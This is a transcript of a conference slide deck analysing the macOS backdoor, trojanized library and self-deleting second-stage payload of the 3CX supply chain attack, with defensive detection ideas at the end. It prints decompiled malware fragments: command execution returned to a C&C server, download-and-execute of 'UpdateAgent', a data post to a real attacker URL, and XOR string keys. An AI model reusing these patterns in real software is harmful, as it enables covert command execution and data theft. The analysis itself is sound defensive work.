Upgrade to Pro — share decks privately, control downloads, hide ads and more …

Mac-ing Sense of the 3CX Supply Chain Attack: A...

Mac-ing Sense of the 3CX Supply Chain Attack: Analysis of the macOS Payloads

Supply chain attacks are some of the most damaging cybersecurity incidents, capable of infecting a massive number of unsuspecting users and companies through widely used and trusted software. And although the majority of such attacks impact Windows-based computers, the recent nation-state attack against the popular PBX software provider 3CX, was also capable of infecting macOS systems.

Believed to be the first "chained" supply chain attack (where initial access to 3CX was gained via a separate supply chain attack), this talk will focus on its macOS payloads. To start, we will analyze the implant installed by the attackers to maintain persistent access to 3CX's macOS build server. Then, we will dive into the malicious library that was surreptitiously slipstreamed into a malicious update and installed globally by 3CX's unsuspecting macOS enterprise users. Lastly, we'll detail the core capabilities of the self-deleting 2nd-stage payload, as well as tackle several questions it raised.

The talk will conclude by highlighting heuristic methods of detection capable of thwarting various aspects of this specific attack, even without prior knowledge. Furthermore, we will demonstrate how these approaches can be leveraged to detect and mitigate future supply chain attacks as well.

Patrick Wardle

August 10, 2023
Tweet

More Decks by Patrick Wardle

Other Decks in Technology

Transcript

  1. WHOAMI Patrick Wardle macOS security tools "The Art of Mac

    Malware" books "Objective by the Sea" conference Objective-See Foundation, 501(c)(3) ...also, "Paddle Boarder"
  2. WHAT YOU WILL LEARN Analyzing macOS malware All about the

    3CX supply chain attack Heuristic-based malware detection rapidly ! Although the talk is largely focused on the 3CX supply chain attack, we’ll also cover topics of malware analysis and detection.
  3. RESOURCES ...detailing various aspects of the 3CX attack "Active Intrusion

    Campaign Targeting 3CXDesktopApp Customers" 
 crowdstrike.com/blog/crowdstrike-detects-and-prevents-active-intrusion-campaign-targeting-3cxdesktopapp-customers "3CX Software Supply Chain Compromise Initiated by a Prior Software Supply Chain Compromise" 
 mandiant.com/resources/blog/3cx-software-supply-chain-compromise "Ironing out (the macOS) details of a Smooth Operator" (Part I & II) 
 objective-see.org/blog/blog_0x73.html / objective-see.org/blog/blog_0x74.html hired by 3CX to perform forensics / attack analysis
  4. SUPPLY CHAIN ATTACKS definition, and statistics "A supply chain attack

    ...targets a trusted third-party vendor who offers services or software vital to the supply chain. Software supply chain attacks inject malicious code into an application in order to infect all users of an app." -CrowdStrike Supply chain statistics (credit: CrowdStrike) }
  5. THE 3CX ATTACK a diagrammatic overview UNC4736 
 (N. Korean)

    Trading Technologies X_Trader 3CX App 3CX attack #1 attack #2 Our focus: (macOS) backdoor (macOS) installer (macOS) 2nd-stage payload 2nd 
 -stage
  6. HOW DETECTIONS ALL BEGAN ...on the forums of 3CX (March

    22nd) Have a read: www.3cx.com/community/threads/threat-alerts-from- sentinelone-for-desktop-update-initiated-from-desktop-client.119806/ 3CX support: 
 "go ask the AV company"
  7. FIRST REPORT / CONFIRMATION ...from CrowdStrike (March 29th) "Active Intrusion

    Campaign Targeting 3CXDesktopApp Customers" 
 crowdstrike.com/blog/crowdstrike-detects-and-prevents-active-intrusion-campaign-targeting-3cxdesktopapp-customers
  8. BUT WHAT ABOUT MACOS? ...analysis via Objective-See (March 29th) "The

    3CXDesktopApp is available for Windows, macOS, Linux and mobile. At this time, [malicious] activity has been observed on both Windows and macOS" -CrowdStrike ...initial confusion about impact to macOS }
  9. INFECTING 3CX (via) supply chain attack #1 UNC4736 
 Trading

    Technologies X_Trader 3CX App 3CX attack #1 attack #2 2nd 
 "Eventually, the threat actor was able to compromise both [3CX's] Windows and macOS build environments… 
 
 The macOS build server was compromised using a POOLRAT backdoor" -Mandiant VPN creds. 
 + lateral movement
  10. POOLRAT a lightweight macOS backdoor "a C/C++ macOS backdoor capable

    of collecting basic system information and executing commands. The commands performed include running arbitrary commands, secure deleting files, reading and writing files, updating the configuration." -Mandiant } 3CX's build server (infected with POOLRAT) Capabilities 
 (exec, file exfil, etc...) attacker's C&C server
  11. POOLRAT ...seen before? rule MTI_Hunting_POOLRAT { 
 meta: 
 author

    = "Mandiant" 
 ... 
 md5 = "451c23709ecd5a8461ad060f6346930c" 01 02 03 04 
 05 rule XProtect_MACOS_c723519 { 
 meta: 
 description = "MACOS.c723519" 
 strings: 
 $s1 = { 5F 6D 5F 43 6F 6E 66 69 67 } 
 $s2 = { 5F 5F 5A 39 53 65 74 43 6F 6E 66 69 67 76 } 
 $s3 = { 5F 5F 5A 31 30 4C 6F 61 64 43 6F 6E 66 69 67 76 } 
 ... 
 condition: 
 Macho and filesize < 100KB and all of them 
 } 01 02 03 04 
 05 06 07 08 09 10 11 md5 hash Mandiant's detection rule Sample, submitted to VirusTotal (June, 2020) Apple's XProtect Signature (July, 2020)
  12. BASIC TRIAGE file type & code signing % file PoolRAT/prtspool

    
 PoolRAT/prtspool: Mach-O 64-bit executable x86_64 % codesign -dvv PoolRAT/prtspool Executable=PoolRAT/prtspool Identifier=xttm-5555494424668e99d3173e03a74c86801f09f4a9 Format=Mach-O thin (x86_64) ... Signature=adhoc 
 TeamIdentifier=not set File type 
 (64-bit Mach-O) "signed" 
 ...but with an adhoc signature Code signing information unsurprising, but good to know ...most analysis tools are file-type specific !
  13. BASIC TRIAGE embedded strings % strings - PoolRAT/prtspool 
 POST

    https:// --%s%sContent-Disposition: form-data; 
 name="upload"; filename="plain.jpg"%sContent-Type: /private/etc/krb5d.conf https://airbseeker.com/rediret.php https://globalkeystroke.com/pockbackx.php ... __Z9GetOSInfoP15_COMINFO_STRUCT __Z10GetComInfoP15_COMINFO_STRUCT __Z7MSG_RunP11_MSG_STRUCT __Z7MSG_CmdP11_MSG_STRUCT __Z6MSG_UpP11_MSG_STRUCT __Z8MSG_DownP11_MSG_STRUCT Conf. file? } C&C servers? Commands? While embedded strings can (and should) guide you analysis efforts, always verify via continued analysis, using a disassembler/debugger!
  14. BASIC TRIAGE (demangled) method names % nm PoolRAT/prtspool | c++filt

    0000000100003dd2 t Initialize() 0000000100002161 t LoadConfig() ... 0000000100002837 t Connect(char*, unsigned int, unsigned int) 00000001000036ff t MSG_Cmd(_MSG_STRUCT*) 0000000100003071 t MSG_Dir(_MSG_STRUCT*) 00000001000035ec t MSG_Run(_MSG_STRUCT*) ... 
 0000000100000e87 t SendPost(char*, unsigned char*, 
 unsigned int, unsigned char*, unsigned int*) ... 0000000100002604 t GetOSInfo(_COMINFO_STRUCT*) Load config? } Comms/tasking? Survey pipe thru c++filt to demangle Extracting method names 
 (via nm & c++filt)
  15. ENCRYPTED STRINGS? ...passed to a function called 'GetTrick' movabs rax,

    0xe04247a4e570e4d 
 lea rbx, qword [rbp+var_20] 
 mov qword [rbx], rax 
 mov word [rbx+8], 0x4414 
 mov esi, 0xa 
 mov rdi, rbx 
 call GetTrick 01 02 03 04 
 05 06 07 % lldb PoolRAT/prtspool ... (lldb) Process 24641 stopped callq 0x1000047da ; GetTrick(unsigned char*, unsigned int) (lldb) x/10xb $rdi 0x30410e370: 0x4d 0x0e 0x57 0x4e 0x7a 0x24 0x04 0x0e 0x14 0x44 (lldb) reg read $rsi rsi = 0x0a 1st arg: encrypted string 2nd arg: string length } Pieces of encrypted string? String decryption function? It's a good idea to decrypt strings before continuing analysis 
 ...as they often contain (very) valuable information / insights!
  16. STRING DECRYPTION ...rather trivial as (static) key is hardcoded GetTrick(unsigned

    char*, unsigned int) 
 
 dec esi ; length-- 
 je leave ; leave if zero 
 
 mov r8d, esi ; length 
 lea rsi, qword [key] ; "bj28UJqbxz7789HgsdW73hdu8A5Stream" 
 xor ecx, ecx ; init index 
 
 decrypt: 
 mov rax, rcx ; index into key 
 ... 
 mov al, byte [rsi+rax] ; key[offset] 
 xor byte [rdi+rcx], al ; string[index] ^ key[offset] 
 inc rcx ; index++ 
 inc rsi ; key++ 
 cmp r8, rcx ; index != length? 
 jne decrypt ; continue 01 02 03 04 
 05 06 07 08 09 10 11 12 13 14 15 16 17 18 hard-coded key key = "bj28UJqbxz7789HgsdW73hdu8A5Stream" 
 
 def decrypt(string): 
 
 for i in range(len(string)): 
 string[i] = string[i] ^ ord(key[i]) 01 02 03 04 
 05 
 06 Python decryptor "111D6D4E30380242 550A45585C4C2B132 50125445A070A36" "sw_vers -productVersion"
  17. CONFIG FILE /private/etc/krb5d.conf # FileMonitor.app/Contents/MacOS/FileMonitor -pretty -filter prtspool 
 "event"

    : "ES_EVENT_TYPE_NOTIFY_CREATE", "file" : { "destination" : "/private/etc/krb5d.conf", "process" : { 
 "pid" : 27395, "name" : "prtspool", ... "event" : "ES_EVENT_TYPE_NOTIFY_WRITE", "file" : { "destination" : "/private/etc/krb5d.conf", "process" : { 
 "pid" : 27395, "name" : "prtspool", path to config file % hexdump -C /private/etc/krb5d.conf 00000000 36 2a 2a 2e 2d 64 71 71 3f 37 2c 3c 2d 3b 3b 35 |6**.-dqq?7,<-;;5| 00000010 3b 2c 70 3d 31 33 71 2c 3b 3a 37 2c 3b 2a 70 2e |;,p=13q,;:7,;*p.| 00000020 36 2e 5e 5e 5e 5e 5e 5e 5e 5e 5e 5e 5e 5e 5e 5e |6.^^^^^^^^^^^^^^| 00000030 5e 5e 5e 5e 5e 5e 5e 5e 5e 5e 5e 5e 5e 5e 5e 5e |^^^^^^^^^^^^^^^^| encrypted :\
  18. CONFIG FILE DECRYPTION ...via ChatGPT 😆 "Given this function disassembly,

    write a Python script to open 
 the file (extract full path from the disassembly) & decrypt the data" def decrypt_data(filename): 
 with open(filename, 'rb') as file: 
 encrypted_data = file.read() 
 
 decrypted_data = bytearray() 
 for byte in encrypted_data: 
 decrypted_byte = byte ^ 0x5e 
 decrypted_data.append(decrypted_byte) 
 
 return decrypted_data 
 
 file_path = "/private/etc/krb5d.conf" 
 decrypted_content = decrypt_data(file_path) 
 print(decrypted_content) 01 02 03 04 
 05 06 07 08 09 10 11 12 13 14 % python3 decryptConfig.py 
 bytearray(b'https://airbseeker.com/rediret.php...https://globalkeystroke.com/pockbackx.php...https:// airbseeker.com/rediret.php...https://www.woodmate.it/administrator/help/en-GB/bins/tags/taghelper.php...) decryptor ...written by ChatGPT !
  19. (BASIC) SURVEY macOS version, host name, etc. int GetComInfo(COMINFO_STRUCT *)

    { 
 ... 
 rbx = arg0; 
 if(gethostname(&var_60, 0x40) != -1) 
 strcpy(rbx + 0x4, &var_60); 
 
 GetOSInfo(rbx); 
 GetInternalIP(rbx); 01 02 03 04 
 05 06 07 08 # ProcessMonitor.app/Contents/MacOS/ProcessMonitor -pretty { "event" : "ES_EVENT_TYPE_NOTIFY_EXEC", "process" : { "pid" : 28753 
 "name" : "sw_vers", 
 "path" : "/usr/bin/sw_vers", 
 "arguments" : [ "sw_vers", "-productName" ], ... } } get name os via sw_vers 
 (e.g. "macOS") C&C server Survey ( addr from config file )
  20. TASKING ...and supported commands WorkThread(void*) 
 ... 
 lea r15,

    qword [0x100004234] ;switch table mov rdi, rbx 
 call PopMsg(_MSG_STRUCT*) ;pop message (into rbx) 
 
 mov eax, dword [rbx+4] ;extract message index 
 add eax, r14d ... 
 movsxd rax, dword [r15+rax*4] ;compute handler offset 
 add rax, r15 
 jmp rax ;execute handler 01 02 03 04 
 05 06 07 08 09 10 11 12 13 MSG_Up 
 MSG_Cmd 
 MSG_Run 
 MSG_Dir 
 MSG_Down 
 MSG_Test 
 MSG_SetPath 
 MSG_SecureDel 
 MSG_WriteConfig } message handlers ( extracted from disasm ) tasking...
  21. MSG_Up Command file upload (from server, to infected host) MSG_Up(MSG_STRUCT*

    msg) { 
 ... 
 rdi = msg + 0xc; 
 rsi = "a+"; 
 if (*(msg + 0x110) == 0x0) 
 rsi = "w+"; 
 
 rax = fopen(rdi, rsi); 
 ... 
 rax = Recv(r13, &var_14C, r14, 0x0); 
 ... 
 fwrite(r13, rsi, 0x1, r15); 01 02 03 04 
 05 06 07 08 09 10 11 12 Receive data from C&C server Write out to file Open file 
 (path specified in command)
  22. MSG_Cmd Command execute a command, and return output int MSG_Cmd(MSG_STRUCT*

    arg) { 
 
 string = 0x42406c6b0a121947; 
 *(&string + 0x8) = 0x375e; 
 GetTrick(&string, 0xa); 
 
 sprintf(command, &var_360); 
 rax = popen(&var_350, "r"); 
 
 r14 = fileno(rax); 
 r15 = read(r14, var_368, 0x19000); 
 
 memcpy(var_370, var_368, r15); 
 Send(var_370, r15 + 0x4, rbx); 01 02 03 04 
 05 06 07 08 09 10 11 12 
 13 
 14 Build and execute command Read output and send to C&C Decrypt string: "%s 2>&1 &"
  23. THE INFECTED 3CX INSTALLER supply-chain attack #2 UNC4736 
 Trading

    Technologies X_Trader 3CX App 3CX attack #1 attack #2 Our focus: (macOS) backdoor (macOS) installer (macOS) 2nd-stage payload 2nd 

  24. 3CX Desktop App versions: v18.11.1213, v18.12.416 signed & notarized means:

    Apple scanned & "approved" it !! "At this time, we cannot confirm that the Mac installer is similarly trojanized" -SentinelOne (3/29)
  25. Finding the needle ...in the ~400mb haystack % cd /Volumes/3CXDesktopApp-18.12.416/3CX\

    Desktop\ App.app 
 % du -h . 
 ... 381M /Volumes/3CXDesktopApp-18.12.416/3CX Desktop App.app % find . -type f | wc -l 113 ~400 mb app w/ 100+ files! % ls Contents/Frameworks/Electron\ Framework.framework/Versions/A/Libraries libEGL.dylib 
 libGLESv2.dylib 
 libffmpeg.dylib libffmpeg.dylib libffmpeg.dylib
  26. libffmpeg.dylib ...loaded each time the 3CX application is launched %

    otool -L "3CX Desktop App.app/Contents/Frameworks/Electron Framework.framework/Versions/A/Electron Framework" ... 
 @rpath/libffmpeg.dylib % otool -L "3CX Desktop App.app/Contents/MacOS/3CX Desktop App" ... @rpath/Electron Framework.framework/Electron Framework % file "3CX Desktop App.app/Contents/Frameworks/ 
 Electron Framework.framework/Versions/A/Libraries/libffmpeg.dylib" libffmpeg.dylib: Mach-O 64-bit dynamically linked shared library x86_64 libffmpeg.dylib: Mach-O 64-bit dynamically linked shared library arm64 File type: universal dynamic library Electron Framework libffmpeg.dylib Dependencies
  27. libffmpeg.dylib and its constructor (x86_64 only!) EntryPoint: 
 xor eax,

    eax 
 jmp run_avcodec 
 ... 
 
 run_avcodec: 
 push rax 
 movabs rax, 0xaaaaaaaaaaaaaaaa 
 mov rdi, rsp 
 mov qword [rdi], rax 
 lea rdx, qword [0x48430] 
 xor esi, esi 
 xor ecx, ecx 
 call pthread_create 
 pop rax 
 ret 01 02 03 04 
 05 06 07 08 09 10 11 12 13 14 15 16 Section 
 sectname __mod_init_func 
 segname __DATA 
 addr 0x0000000000275d90 
 size 0x0000000000000008 
 ... 01 02 03 04 
 05 06 The arm64 version, has no constructor, 
 nor apparent malicious subversions (...and thus is pristine). automatically executed when 
 the library is loaded (e.g. when the 3CX app is run) "__mod_init_func" 
 (Intel x86_64)
  28. Thread function large, and suspicious! do { 
 *(rsp +

    rax + 0x1b40) = *(rsp + rax + 0x1b40) ^ 0x7a; 
 rax = rax + 0x1; 
 } while (rax != 0x32); 01 02 03 04 int sub_48430() { 
 rsp = rsp - 0x2400; 
 rax = getenv("HOME"); 
 if (rax == 0x0) goto loc_48965; 
 
 ... 600 more lines! 01 02 03 04 
 05 06 600+ lines disassembled ! ...including xor decryption How to debug a dynamic library? ( such as the suspicious libffmpeg.dylib )
  29. Debugging a Dylib simple loader, and lldb (debugger) #import <dlfcn.h>

    
 #import <Foundation/Foundation.h> 
 
 int main(int argc, const char * argv[]) { 
 
 void * handle = dlopen(argv[1], RTLD_LOCAL | RTLD_LAZY); 
 dispatch_main(); 
 
 } 01 02 03 04 
 05 06 07 08 09 compile as x86_64 ( as we want to debug the Intel dylib ) % lldb loader libffmpeg.dylib 
 (lldb) target create "loader" (x86_64) 
 (lldb) settings set -- target.run-args libffmpeg.dylib" ... (lldb) b pthread_create (lldb) run 
 
 Process 666 stopped * thread #1, stop reason = breakpoint 1.1 libsystem_pthread.dylib`pthread_create: -> 0x7ff81c81c445 <+0>: xorl %r8d, %r8d dylib loader Breakpoint on thread creation
  30. Rebase simple loader, and lldb (debugger) (lldb) image list ...

    [151] 4C4C445F-5555-3144-A1E5-50E749C861FD 0x000000010a000000 libffmpeg.dylib (lldb) b 0x10a048430 Breakpoint 2: address = 0x000000010a048430 
 (lldb) continue Process 666 stopped * thread #2, stop reason = breakpoint 2.1 libffmpeg.dylib`___lldb_unnamed_symbol1736: -> 0x10a048430 <+144>: pushq %rbp Rebase library in disassembler Breakpoint on address 
 of the thread function List images (load addresses) base address
  31. String Encryption / Decryption ...trivial, as it's just a XOR

    loop (key: 0x7a) loop: 
 xor byte [var_8C8], 0x7a 
 inc rax 
 cmp rax, 0x32 
 jne loop 01 02 03 04 
 05 encrypted strings #!/usr/bin/Python3 
 key = 0x7a 
 
 with open(libffmpeg.dylib, "rb") as in, open("out.txt", "wb") as out: 
 content = in.read() 
 out.write(bytes(byte ^ key for byte in content)) 01 02 03 04 
 05 06 officestoragebox.com/api/biosync 
 visualstudiofactory.com/groupcore 
 ... 
 Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/ 108.0.5359.128 Safari/537.36 } C&C addresses, 
 user-agent, etc.
  32. Capabilities simple survey, and connection to C&C # FileMonitor.app/Contents/MacOS/FileMonitor -filter

    loader { "event" : "ES_EVENT_TYPE_NOTIFY_OPEN", "file" : { "destination" : "/System/Library/CoreServices/SystemVersion.plist", "process": { "name": "loader", ... Survey string: "13.3;Users-MacBook-Pro.local;6180;14" (lldb) po $rdi <NSMutableURLRequest: 0x60000000c000> { URL: https://akamaitechcloudservices.com/v2/fileapi } ... (lldb) po $rdx 3cx_auth_id=fcd5e94a-aa69-393f-53e4-5e1057a616f1;3cx_auth_token_content=.X8uY9vZ9x[8x]? y_7{a&semi>{b9}c:yXE!Y<&c?zgB&dol>hF)iB)jC&plus>kK(lK&per>dN0eF2eG(pL)hR-jJ6mL-tO- lV5tW4sX7sY&semi>sZ6u[4v];__tutma=true cookie, with uuid, encrypted survey, etc. macOS version (from SystemVersion.plist)
  33. Capabilities download & execute 000000000023d226 db "UpdateAgent", 0 
 


    stream = fopen(path, "wb"); 
 fwrite(data, size, 0x1, stream); 
 fflush(stream); 
 fclose(stream); 
 
 chmod(path, 755o); 
 ... 
 
 popen(path, "r"); 01 02 03 04 
 05 06 07 08 09 10 11 Write out binary from server to "UpdateAgent" (~/Library/Application Support/3CX Desktop App/) Make it executable (755) Execute it hardcoded name: "UpdateAgent" "UpdateAgent"
  34. THE INFECTED 3CX INSTALLER supply-chain attack #2 UNC4736 
 Trading

    Technologies X_Trader 3CX App 3CX attack #1 attack #2 Our focus: (macOS) backdoor (macOS) installer (macOS) 2nd-stage payload 2nd 
 -stage
  35. BASIC TRIAGE file type & code signing % file UpdateAgent

    
 UpdateAgent: Mach-O 64-bit executable x86_64 % codesign -dvvv UpdateAgent 
 Executable=/Users/user/Library/Application Support/3CX Desktop App/UpdateAgent Identifier=payload2-55554944839216049d683075bc3f5a8628778bb8 CodeDirectory v=20100 size=450 flags=0x2(adhoc) hashes=6+5 location=embedded ... Signature=adhoc File type 
 (64-bit Mach-O) "signed" ...but adhoc Code signing information 
 (adhoc) 000000000023d226 db "UpdateAgent", 0 
 
 stream = fopen(path, "wb"); 
 fwrite(data, size, 0x1, stream); 
 
 chmod(path, 0x1ed); 
 popen(path, "r"); 01 02 03 04 
 05 06 07 1st-stage 2nd-stage
  36. BASIC TRIAGE embedded strings % strings - UpdateAgent %s/Library/Application Support/3CX

    Desktop App/config.json "url": "https:// "AccountName": " https://sbmsa.wiki/blog/_insert 3cx_auth_id=%s;3cx_auth_token_content=%s;__tutma=true URLWithString: requestWithURL: addValue:forHTTPHeaderField: dataTaskWithRequest:completionHandler: Config file? } C&C server? Unlike libffmpeg.dylib it appears that most of the embedded strings in UpdateAgent, are not obfuscated
  37. Self-Deletion ...for self-defense? int main(int argc, char * argv[]) {

    
 
 if(fork() == 0) { 
 ... 
 
 unlink(argv[0]); 01 02 03 04 
 05 06 # FileMonitor.app/Contents/MacOS/FileMonitor -filter UpdateAgent { "event" : "ES_EVENT_TYPE_NOTIFY_UNLINK", "file" : { "destination" : "~/Library/Application Support/3CX Desktop App/UpdateAgent", "process" : { "name" : "UpdateAgent", "path" : "~/Library/Application Support/3CX Desktop App/UpdateAgent" Observing self-deletion 
 (via a file monitor) delete file "We could see the execution of something called UpdateAgent and a hash but it had self-deleted [so couldn't be collected]" -SentinelOne self-delete
  38. Reading 3CX's config.json ...to extract provisioning file & account name

    int parse_json_config(char* user) { 
 ... 
 sprintf(path, "%s/Library/Application Support/3CX Desktop App/config.json", user); 
 
 stream = fopen(path, "r"); 
 fread(buffer, rsi, 0x1, stream); 
 
 rax = strstr(&var_1030, "\"url\": \"https://"); 
 ... 
 rax = strstr(&var_1030, "\"AccountName\": \""); 01 02 03 04 
 05 06 07 08 09 10 # FileMonitor.app/Contents/MacOS/FileMonitor -filter UpdateAgent { "event" : "ES_EVENT_TYPE_NOTIFY_OPEN", "file" : { "destination" : "~/Library/Application Support/3CX Desktop App/config.json", ... "process" : { "name" : "UpdateAgent", "path" : "~/Library/Application Support/3CX Desktop App/UpdateAgent" file open "url" 
 contains xml provisioning file for the VOIP system Observing config.json access 
 (via a file monitor)
  39. Transmit data to C&C Server ...and then, ...nothing? (exits) send_post("https://sbmsa.wiki/blog/_insert",

    &paramString, &request); C&C server Info from 3CX config file (encrypted) int main(int argc, const char * argv[]) { 
 ... 
 response = send_post("https://sbmsa.wiki/blog/_insert", &paramString, &request); 
 
 if (response != 0x0) { 
 free(response); 
 } 
 return 0; 01 02 03 04 
 05 06 07 08 09 ...after response, 
 always (just) exits
  40. Why? ...a few thoughts Payload #1 Payload #2 Different victims,

    
 get different payloads The attack was detected early (enough) still in information gathering stage
  41. What doesn't work preventing supply chain attacks "Today, the average

    software project has 203 dependencies 
 ...[and] just because a software product was validated in the past doesn’t mean that software is secure today" -CrowdStrike your network } developer's computer ...you can't control/secure
  42. What doesn't work sticking to open-source software that you compile

    You can't compile most my open-source tools without your own entitlement ...which Apple isn't going to give you :\ Source code Pre-built bins Writing open-source software on macOS also 
 N. Korea
  43. What doesn't work Apple's security (e.g. notarization) Issues: Apple Platform

    Security macOS & users trust notarized software macOS blocks non-notarized software ( it's really more about Apple 
 telling us what we can run our Macs )
  44. What Might Work maybe version diffing? % otool -l /Volumes/3CXDesktopApp-18.11.1213/

    
 3CX Desktop App.app/.../Libraries/libffmpeg.dylib Section sectname __mod_init_func segname __DATA addr 0x0000000000275d90 size 0x0000000000000008 v18.10.461 v18.11.1213+ new constructor thoughts from 
 ReversingLabs 3CX Application:
  45. What Does Work? detecting malicious behaviors "Supply chain attacks are

    hard to detect. 
 ...employ solutions that include behavioral-based attack detection" -CrowdStrike A few ideas: Network anomalies Untrusted processes Unusual behavior
  46. Network Detection via (host-based) DNS monitoring % DNSMonitor.app/Contents/MacOS/DNSMonitor [{ "Process"

    : { "pid" : 40029, "path" : "\/Applications/3CX Desktop App\/Contents\/MacOS\/3CX Desktop App }, "Packet" : { "QR" : "Query", "Questions" : [ { "Question Name" : "msstorageboxes.com", "Question Class" : "IN", ... "DNS Monitor" 
 (github.com/objective-see/) 3CX.com DNS query of attacker's server
  47. Blocking Non-platform / Non-notarized intercepting process execution (e.g. "UpdateAgent") "Writing

    a Process Monitor with Apple's Endpoint 
 Security Framework" objective-see.com/blog/blog_0x47.html //client/event of interest 
 @property es_client_t* esClient; 
 es_event_type_t events[] = {ES_EVENT_TYPE_AUTH_EXEC}; 
 
 //new client 
 //callback will process 'ES_EVENT_TYPE_AUTH_EXEC' events 
 es_new_client(&esClient, ^(es_client_t *client, const es_message_t *message) 
 { 
 //TODO: process event 
 // return ES_AUTH_RESULT_ALLOW or ES_AUTH_RESULT_DENY 
 } 
 
 //subscribe 
 es_subscribe(endpointProcessClient, events, 1); 01 02 03 04 05 06 07 08 09 10 11 12 13 14 ES Process Exec Monitor 
 (ES_EVENT_TYPE_AUTH_EXEC) callback for 
 process execs
  48. Blocking Non-platform / Non-notarized classify binary (and block if needed)

    SecCodeRef codeRef = <from pid, audit token, path, etc.> 
 
 //init requirement string(s) 
 SecRequirementRef isAppleReq = nil; 
 SecRequirementRef isNotarizedReq = isNotarizedReq; 
 
 SecRequirementCreateWithString(CFSTR("anchor apple"), kSecCSDefaultFlags, &isAppleReq); 
 SecRequirementCreateWithString(CFSTR("notarized"), kSecCSDefaultFlags, &isNotarizedReq); 
 
 //check against requirement string 
 if( (!SecCodeCheckValidity(codeRef, kSecCSDefaultFlags, isAppleReq) && 
 (!SecCodeCheckValidity(codeRef, kSecCSDefaultFlags, isNotarizedReq)) { 
 
 //untrusted process 
 // block via ES_AUTH_RESULT_DENY 
 
 } 01 02 03 04 05 06 07 08 09 10 11 12 13 
 14 15 16 Full code: BlockBlock 
 github.com/objective-see/BlockBlock
  49. Other Anomalous Behaviors ...such as a self-deleting processes int main(int

    argc, const char * argv[]) { 
 
 if(fork() == 0) { 
 ... 
 
 unlink(argv[0]); 01 02 03 04 
 05 06 # FileMonitor.app/Contents/MacOS/FileMonitor -filter UpdateAgent { "event" : "ES_EVENT_TYPE_NOTIFY_UNLINK", "file" : { "destination" : "~/Library/Application Support/3CX Desktop App/UpdateAgent", ... "process" : { "pid" : 38206, "name" : "UpdateAgent", "path" : "~/Library/Application Support/3CX Desktop App/UpdateAgent" Self-deletion ("UpdateAgent") 2nd-stage payload: self-deletes, via unlink } responsible process == file being deleted
  50. TAKEAWAYS By studying the components, we can gain 
 an

    in-depth understanding of these threats. Behavior-based heuristics offer the best (only?) approach of detection. Supply Chain Attacks Trends: Prevalence Complexity Impact (even to macOS)
  51. Interested in Learning More? read, "The Art of Mac Malware"

    book(s) "The Art of Mac Malware" 
 free @ https://taomm.org Coming soon! 
 Vol. II: (programmatic) detection
  52. Objective-See Foundation 501(c)(3) learn more our community efforts ...& support

    us! 🥰 The Objective-See Foundation 
 objective-see.org/about.html #OBTS Conference College Scholarships Diversity Programs 
 ("Objective-We")
  53. RESOURCES: "Ironing out (the macOS) details of a Smooth Operator"

    (Part I & II)" 
 objective-see.org/blog/blog_0x73.html / objective-see.org/blog/blog_0x74.html 
 "Smooth Operator" 
 ncsc.gov.uk/static-assets/documents/malware-analysis-reports/smooth-operator/NCSC_MAR-Smooth-Operator.pdf 
 
 "Active Intrusion Campaign Targeting 3CXDesktopApp Customers" 
 crowdstrike.com/blog/crowdstrike-detects-and-prevents-active-intrusion-campaign-targeting-3cxdesktopapp-customers 
 
 "3CX Software Supply Chain Compromise Initiated by a Prior Software Supply Chain Compromise" 
 mandiant.com/resources/blog/3cx-software-supply-chain-compromise 
 
 "Red flags flew over software supply chain-compromised 3CX update" 
 reversinglabs.com/blog/red-flags-fly-over-supply-chain-compromised-3cx-update Mac-ing Sense of the 
 3CX Supply Chain Attack